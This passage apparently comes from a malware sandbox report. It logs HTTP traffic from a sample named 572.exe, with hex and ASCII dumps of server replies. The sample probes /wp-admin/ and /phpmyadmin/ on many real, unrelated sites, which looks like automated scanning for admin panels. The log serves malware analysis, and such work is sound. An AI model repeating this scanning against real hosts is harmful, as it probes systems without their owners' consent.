                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.098521948 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.113080978 CET232OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ucivirtual.uci.edu.mx/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.300416946 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.300434113 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                243192.168.2.656241142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.039247036 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.159806967 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.159823895 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f cd 0a 83 30 10 84 ef 3e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 f9 41 63 c1 b7 6f 4c 7b ec 5c 96 9d 1d 86 6f 71 cd da 86 24 b8 a6 79 19 06 7b b0 86 92 d6 be e5 00 98 d4 ce 2e 7c 99 e6 1d a3 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0>EHkA$b0AcoL{\oq$y{.|!,k>*F,(x^7aJMK+1sPWv3~MGkYj;d$J.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                244192.168.2.656300162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.048795938 CET175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.176980972 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                245192.168.2.656237172.66.43.6480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.053714037 CET184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.181782961 CET666INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://nuevopacto.runacode.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eCct1yLTc7owAZ9%2BZGpsFxroGVhX7fmUisf%2Fzt%2BRhLvVF11CenAZmD0UJ4OBUixZhsORoCZBI%2F8vkoeP7T%2F%2FQCG2VIhwQmK%2B3QUcf25XN1TVeVCYbXMUZiafe%2FhFaNsEZuLKFEI7KKRm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb73abf353e8-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                246192.168.2.656280170.114.52.480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.056612968 CET176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.229437113 CET1020INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=LQ8WoD.SR3VH6INhyLDgKDuFPKFURnPcQUXaG8WNVTE-1707131692-1-AYebvAryME1QooGZcgb2kXEKv/f4PqwsxOVaYN6aNTU5kFxcQpuxSHGBUjF9QHPKh9qL24Jhu1JKRplpPOzwZno=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fbAyBjaIdFkFWV9EkKE7JcJT8MHT8jg58L5kC0a8yLgb3K3YkHh%2FiYMYlP6z2myjGZk0hbqu%2F8R4PlodXI2XsfLffpUsnDYvFKYdPOF%2BxpWVohDNlSSb5UXlK4bh49dtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb73aace53cc-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
